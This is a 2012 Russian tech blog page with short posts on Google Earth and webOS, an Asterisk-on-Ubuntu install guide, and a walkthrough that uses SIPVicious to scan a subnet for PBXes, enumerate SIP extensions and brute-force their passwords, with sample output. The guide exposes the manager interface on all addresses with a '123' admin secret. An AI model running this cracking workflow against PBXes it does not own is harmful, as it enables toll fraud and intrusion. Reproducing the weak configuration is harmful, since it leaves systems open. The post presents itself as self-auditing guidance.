пятница, 27 января 2012 г.

В Google Earth 6.2 исчезли швы на карте

В новой версии Google Earth начали использовать доработанный алгоритм склеивания фотографий, и теперь даже в том случае если снимки были сделаны разными спутниками/самолетами, в разное время года и при разной погоде, они все равно будут выглядеть на карте более однородно чем раньше.



Нам нужен еще один адаптер


четверг, 26 января 2012 г.

HP: открытая версия webOS в сентябре, фреймворк Enyo 2.0 — уже сейчас

В ноябре прошлого года судьба webOS, проекта, в который HP вложила $1,2 млрд, была под большим вопросом. Но месяц спустя компания все-таки определилась и присвоила этой платформе статус проекта с открытым исходным кодом. Теперь же стали появляться первые результаты данного решения.



В частности, HP пообещала, что полностью открытый вариант операционной системы, названный Open webOS 1.0, будет доступен всем желающим в сентябре этого года, о чем она сообщила на официальном сайте. А разработчикам компания предоставила фреймворк Enyo второго поколения. Этот инструмент позволит создавать webOS-приложения для планшетов, смартфонов и настольных веб-браузеров. Как и оригинальный фреймворк, Enyo 2.0 поддерживает WebKit, плюс он получил совместимость с такими современными веб-браузерами как Firefox, Chrome и Safari.

Кроме того, HP объявила о том, что webOS будет использовать стандартное ядро Linux. Это облегчит производителям устройств переход на новую платформу, если они никогда не имели дел с webOS, но при этом знакомы с Android и другими платформами на базе Linux. Фреймворк Enyo 2.0 доступен уже сейчас на официальном сайте.

Это ж надо такое учудить

http://storage5.static.itmages.ru/i/12/0125/h_1327500396_8818611_b71a9f47f0.jpeg
http://storage6.static.itmages.ru/i/12/0125/h_1327500460_1997379_3e48d1747b.jpeg

вторник, 24 января 2012 г.

Ставим сервер Asterisk на Ubuntu

Заметьте, для целей самого Asterisk и Asterisk GUI LAMP сервер не нужен, у Asterisk’а есть свой.

1. Установим сам asterisk, дополнительные звуковые файлы и поддержку mp3-файлов:
sudo apt-get install asterisk asterisk-sounds-extra asterisk-mp3
В процессе установки отвечаем на единственный вопрос о коде страны, в которой находимся – 7 (Россия).2. Далее ставим GUI
а) Поставим предварительные пакеты:
sudo apt-get install build-essential subversion
б) Копируем исходники с сайта Digium
svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0/ asterisk-gui
в) Ждем, пока пробежит список файлов и переходим в папку с исходниками
cd asterisk-gui
г) Конфигурируем
sudo ./configure
д) Собираем и ставим
sudo make
sudo make install
е) Так как установка была от пользователя root, изменим владельца и группу папки, в которую была установка
sudo chown asterisk -R /var/lib/asterisk/
sudo chgrp asterisk -R /var/lib/asterisk/
ж) Настраиваем файлы конфигурации
!ВАЖНО!
1. В пакете Ubuntu идет файл http.conf со знаком ‘+’ в начале файла. Из-за него не стартует встроенный сервер Астериска. Плюсик надо убрать (а лучше вообще стереть все лишнее и оставить только нужное).
2. Кроме этого, в файле manager.conf есть включение внешнего файла, из-за которого подключение менеджера тоже не стартует. Это еще один аргумент в пользу того, что лучше удалить из файлов все лишнее и оставить только нужное.
sudo nano /etc/asterisk/http.conf
Редактируем:
[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0
bindport=8088
prefix=asterisk
Для доступа к GUI укажем пользователя admin с паролем 123 (в реальности пароль лучше указать серьезный)
sudo nano /etc/asterisk/manager.conf
Редактируем:
[general]
enabled = yes
port = 5038
bindaddr = 0.0.0.0
webenabled = yes
[admin]
secret = 123
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,user,config
з) Создаем символьную ссылку (т.к. папка /usr/share/asterisk/static-http у меня уже присутствовала, то сначала ее удаляем), парсер меняет сочетания буковок r m – r f, это надо учесть
sudo эрэм эрэф /usr/share/asterisk/static-http
sudo ln -s /var/lib/asterisk/static-http/ /usr/share/asterisk/
и) Проверим установку
sudo make checkconfig
к) Перезапускаем Asterisk
sudo /etc/init.d/asterisk stop
sudo /etc/init.d/asterisk start
л) GUI должен быть доступен по адресу машины, на которой он установлен:
http://IP:8088/asterisk/static/config/index.html

воскресенье, 22 января 2012 г.

Безопастность Asterisk

Не буду рассказывать, как вы должны защищаться от хацкеров, просто посмотрим как можно проверить свой asterisk на дыры.


Итак есть чудный набор скриптов для этих экспериментов. Называется SIPVicious.


Для того чтобы найти уязвимые акки используются утилиты из пакета SIPVicious: каждая из них работает в консоли и может запускать как под виндой, так и линухом.

Для этого сначала просканируем заданную подсеть (скажем, это будет 192.168.1.1/24), чтобы найти BPX:

./svmap 192.168.1.1/24
| SIP Device | User Agent |
-------------------------------------
| 192.168.1.103:5060 | Asterisk PBX |



Таким образом, мы нашли нашу АТС-ку. Далее необходимо провести ее анализ и отыскать extention’s:

./svwar.py 192.168.1.103
| Extension | Authentication |
------------------------------
| 123 | reqauth |
| 100 | reqauth |
| 101 | noauth |





И хотя результат для нас вряд ли можно назвать неожиданным, мы видим, что номер 101 не требует авторизации. А для 100 и 123 требуется ввести пароль.

Попробуем подобрать его для 100, используя подбор по числовым значениям (а они используются более чем часто):

./svcrack.py 192.168.1.103 -u 100
| Extension | Password |
------------------------
| 100 | 100 |
  

Пароль подобран! Теперь попробуем взломать пасс для аккаунта 123, используя словарик:

 ./svcrack.py 192.168.1.103 -u 123 -d dictionary.txt
| Extension | Password |
------------------------
| 123 | secret |



Пассы найдены: осталось подставить найденные логин-пароль в свой SIP клиент и проверить их в действии. Конечно, вероятность успешного брутфорса на отдельно взятый аккаунт невелика. Но среди сотен extentionов всегда найдется хотя бы один со слабым паролем. Более того, подход “обнаружить bpx, найти extention, подобрать пароль” является одной из самых простых на VoIP.
Никоим образом не несу ответственности за чьи то взломанные PBX. Пост написан для проверки себя на дыры и в ознакомительных целях. Всем удачной защиты)